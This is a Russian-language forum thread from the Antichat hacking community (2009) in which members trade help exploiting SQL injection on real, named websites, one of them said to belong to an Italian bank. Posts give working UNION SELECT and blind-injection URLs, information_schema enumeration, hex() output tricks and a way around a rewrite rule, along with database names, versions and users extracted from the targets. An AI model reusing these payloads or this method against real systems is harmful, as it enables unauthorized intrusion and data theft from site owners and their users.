ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.06.2009, 09:38
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
ttp://www.otoptravel.com/Qua.php?id=1
MsSQL. Не выводятся даные.
|
|
|

10.06.2009, 13:06
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
Не могу подобрать НИ количество столбцов и полей, как только я не крутил....не понимаю в чем проблема....
вот ссыль: http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318 (MYSQL Injection)
При любом раскладе пишет: The used SELECT statements have a different number of columns
если кто нить подберет,расскажите пожалуйста.
П.С. Сайт итальянского банка.
Последний раз редактировалось jecka3000; 10.06.2009 в 13:16..
|
|
|

10.06.2009, 13:25
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
jecka3000
скорее всего это слепая скуля...
http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318+AND+SUBSTRING((v ersion()),1,1)=4
Version: 4.1.16-standard
Database:CRM
User:windpress@media
|
|
|

10.06.2009, 17:37
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме: 785842
Репутация:
239
|
|
Как обойти?
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+CHARACTER_MAXIMUM_LENG TH+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
Вывод норм, как только тейбл нейм так и все
Всего: 64
Тож самое только когда вводишь юзера
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,ve rsion(),database(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
5.0.67-log
u7749_2
|
|
|

10.06.2009, 18:13
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
используй hex():
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,he x(user()),database(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,he x(TABLE_NAME),0x0b)+FROM+information_schema.TABLES +LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goa l%5B3%5D%3D&goal%5B4%5D%3D&page=0
|
|
|

10.06.2009, 19:34
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме: 420226
Репутация:
38
|
|
Заметил в хостинге такие ошибки
aultCode1faultStringWarning:mysql_connect() [function.mysql-connect]: Access denied for user 'rang'@'localhost' (using password: YES) in /usr/home/freehost/www/index.php on line 48faultCode1faultStringWarning:mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 49faultCode1faultStringWarning:mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 53faultCode1faultStringWarning:mysql_fetch_array() : supplied argument is not a valid MySQL result resource in /usr/home/freehost/www/index.php on line 55
а когда начал лить двиг то вылезло вот такое
/home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php
flairh6/my- это мое, а остально ето хостинга
непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать? 
|
|
|

10.06.2009, 19:34
|
|
Новичок
Регистрация: 02.02.2009
Сообщений: 19
Провел на форуме: 278694
Репутация:
9
|
|
В скрипте есть такой участок кода:
$nomer = $_GET['nomer'];
$art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer");
$article = mysql_result($art,0);
Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта?
Вот правило для модреврайт:
RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA]
Возможно ли в этом случае произвести иньекцию и если да то каким образом?
|
|
|

10.06.2009, 19:40
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме: 914766
Репутация:
317
|
|
Flair
Заметил в хостинге такие ошибки
Цитата:
aultCode1faultStringWarning:mysql_connect() [function.mysql-connect]: Access denied for user 'rang'@'localhost' (using password: YES) in /usr/home/freehost/www/index.php on line 48faultCode1faultStringWarning:mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 49faultCode1faultStringWarning:mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 53faultCode1faultStringWarning:mysql_fetch_array() : supplied argument is not a valid MySQL result resource in /usr/home/freehost/www/index.php on line 55
а когда начал лить двиг то вылезло вот такое
/home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php
flairh6/my- это мое, а остально ето хостинга
непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать?
Это просто не конектится(подключатся) МускуЛ...........
|
|
|

11.06.2009, 06:20
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме: 1754802
Репутация:
380
|
|
Сообщение от AngelOfFaith
В скрипте есть такой участок кода:
$nomer = $_GET['nomer'];
$art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer");
$article = mysql_result($art,0);
Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта?
Вот правило для модреврайт:
RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA]
Возможно ли в этом случае произвести иньекцию и если да то каким образом?
Попробуй обратиться к скрипту на прямую art.php?ver=1&nomer=-1[SQL] хотя скорее всего тебя пошлют с NOT FOUND или реврайт на индекс, а так единственая проблемма это пробелы потому как судя по SQL запросу коментить ничего не надо(хотя я больше чем уверен что пременная используеться где то еще в SQL запросе).
|
|
|

11.06.2009, 15:09
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме: 1168802
Репутация:
298
|
|
есть sql-inj
http://www.yetinepal.com/modules/school/school.php?id=2+order+by+1
количество столбцов - 1
пробую union select
http://www.yetinepal.com/modules/school/school.php?id=2+uNion+sElecT+1
получаем 1222 - The used SELECT statements have a different number of columns
как такие ситуации можно обойти?
P.s. мускул пятый
http://www.yetinepal.com/modules/school/school.php?id=2+and+substring(version(),1,1)=5
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|